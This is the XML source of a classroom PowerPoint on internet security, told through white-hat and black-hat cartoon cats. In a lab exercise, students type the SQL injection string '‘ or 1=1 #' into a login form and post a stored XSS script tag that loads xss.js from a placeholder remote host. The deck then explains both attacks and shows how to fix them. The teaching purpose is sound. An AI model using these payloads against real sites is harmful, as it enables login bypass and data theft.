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-276" y="-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9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5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5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0255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093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06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03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87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2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4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1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4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50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74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32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Internet Security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PROTECTING our information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172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830" y="-88113"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let’s fix your site!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22608" cy="3499407"/>
          </a:xfrm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3426459" y="1130698"/>
            <a:ext cx="8105141" cy="25673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Your sites language; PHP, has some tricks up its sleeves:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>validate.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Change the code at the top to use PDO Parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Save, and test to make sure the SQL Injection fix has worked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Never assume!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492" y="5466659"/>
            <a:ext cx="1117600" cy="1283702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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8716146" y="6108510"/>
            <a:ext cx="2590800" cy="4585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CURSES! MY EXPLOITS!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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1129023" y="3700456"/>
            <a:ext cx="9810469" cy="2693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Now let’s clean up what can be created, and what can be loaded:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First, open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Adminer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and delete the XSS items</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Next, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, change the code used to load your information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Save, and test again!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342463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439" y="292286"/>
            <a:ext cx="7267061" cy="8493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Nya! BUT I STILL GOT YUR DATAZ!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83439" cy="35417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392" y="3358593"/>
            <a:ext cx="3322608" cy="349940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16001" y="4145968"/>
            <a:ext cx="8191500" cy="825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You did, but I’ve reported your deeds.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96892" y="4933342"/>
            <a:ext cx="8572500" cy="825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People are now aware and defending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9700" y="5758656"/>
            <a:ext cx="11239500" cy="825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themselves! And soon, you will be caught!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438" y="292286"/>
            <a:ext cx="7267061" cy="8493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Curses! THIS ISN’T OVER PACKET…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83439" cy="35417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392" y="3358593"/>
            <a:ext cx="3322608" cy="349940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08797" y="4083979"/>
            <a:ext cx="10121899" cy="825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 WILL I, and I WILL KEEP REPORTING THEM!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83439" y="1141649"/>
            <a:ext cx="7267061" cy="849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 will find more exploits!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1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29200" y="3044279"/>
            <a:ext cx="213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THE END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1612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zoom dir="in"/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:zoom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“talk”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 knew it was coming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1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digital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789125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Where you live</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Where you go to school</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Where you hang out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Who you hang out with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When you plan to hang out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30537" y="2249487"/>
            <a:ext cx="536883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you like to do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What services you use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How you pay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And so on…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429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the hackers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53338" y="2097088"/>
            <a:ext cx="5194073" cy="354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Packet the Cat - White Hat Hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Motivated by discovery, strong ethics, and a sense of justice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Doesn’t break the laws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Will discover and report system exploits as soon as they’re found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72" y="2097088"/>
            <a:ext cx="3322608" cy="3499407"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5983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the hackers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729" y="2097089"/>
            <a:ext cx="3083439" cy="3541712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141413" y="2097087"/>
            <a:ext cx="5194073" cy="35417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Black Hat Hacker – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Hackit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> the Cat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Motivated by greed, controversial political goals, or in search for the LULS!!!1one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Works </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>outside of the law</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Will use and abuse exploits in systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11405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do we keep people out?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85000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Locks, doors… user gateways</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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17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user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Copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>login.inc, login_state.inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>logout.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>validate.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>create_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>users.sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>script in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Adminer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Edit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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9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551" y="3871170"/>
            <a:ext cx="10523719" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nyeh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> heh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>heh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>heh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>! Time to hack your websites!!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92" y="618518"/>
            <a:ext cx="3083439" cy="3541712"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148926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4759" y="292286"/>
            <a:ext cx="5633563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Now its your turn! NYA!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0" y="0"/>
            <a:ext cx="3083439" cy="3541712"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3194759" y="1902752"/>
            <a:ext cx="3587637" cy="147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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> type:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>‘ or 1=1 #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272096" y="3514797"/>
            <a:ext cx="11478890" cy="2064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you’re logged in, create a new item using this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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&lt;script language=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=http://#.#.#.#/xss.js&gt;&lt;/script&gt;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900" y="5469192"/>
            <a:ext cx="1308100" cy="1377706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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623300" y="5436180"/>
            <a:ext cx="2733600" cy="553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WHAT ARE YOU DOING?!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93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831" y="-198671"/>
            <a:ext cx="9315169" cy="147857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 think someone hacked your website!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22608" cy="3499407"/>
          </a:xfrm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3500409" y="970049"/>
            <a:ext cx="2519392" cy="8408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/>
              <a:t>‘ or 1=1 #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4239259" y="1969244"/>
            <a:ext cx="7181141" cy="15319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This is what’s called an: SQL Injection Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It’s used to bypass normal barriers,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Or change what is being requested.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698078"/>
            <a:ext cx="114982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&lt;script language=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=http://#.#.#.#/xss.js&gt;&lt;/script&gt;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2054859" y="4385680"/>
            <a:ext cx="7181141" cy="20024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This is what’s called a: Cross Site Scripting (XSS) Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Places code on your website that you cannot control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It can cause massive changes on the site,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Or it can leak private information to a third party.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492" y="5466659"/>
            <a:ext cx="1117600" cy="1283702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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9459808" y="5472318"/>
            <a:ext cx="1960592" cy="54890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NYEH HEH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</a:rPr>
              <a:t>HEH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!!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98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344</TotalTime>
  <Words>468</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>69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Circuit</vt:lpstr>
      <vt:lpstr>Internet Security</vt:lpstr>
      <vt:lpstr>Your digital Identity</vt:lpstr>
      <vt:lpstr>Meet the hackers</vt:lpstr>
      <vt:lpstr>Meet the hackers</vt:lpstr>
      <vt:lpstr>How do we keep people out?</vt:lpstr>
      <vt:lpstr>Setting up a user gateway</vt:lpstr>
      <vt:lpstr>Nyeh heh heh heh! Time to hack your websites!!</vt:lpstr>
      <vt:lpstr>Now its your turn! NYA!</vt:lpstr>
      <vt:lpstr>I think someone hacked your website!</vt:lpstr>
      <vt:lpstr>Let’s fix your site!</vt:lpstr>
      <vt:lpstr>Nya! BUT I STILL GOT YUR DATAZ!</vt:lpstr>
      <vt:lpstr>Curses! THIS ISN’T OVER PACKET…</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The “talk”</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Red River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</dc:title>
  <dc:creator>Jason Johnston</dc:creator>
  <cp:lastModifiedBy>Windows User</cp:lastModifiedBy>
  <cp:revision>32</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-03-27T23:51:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-05T17:06:21Z</dcterms:modified>
</cp:coreProperties>
</file>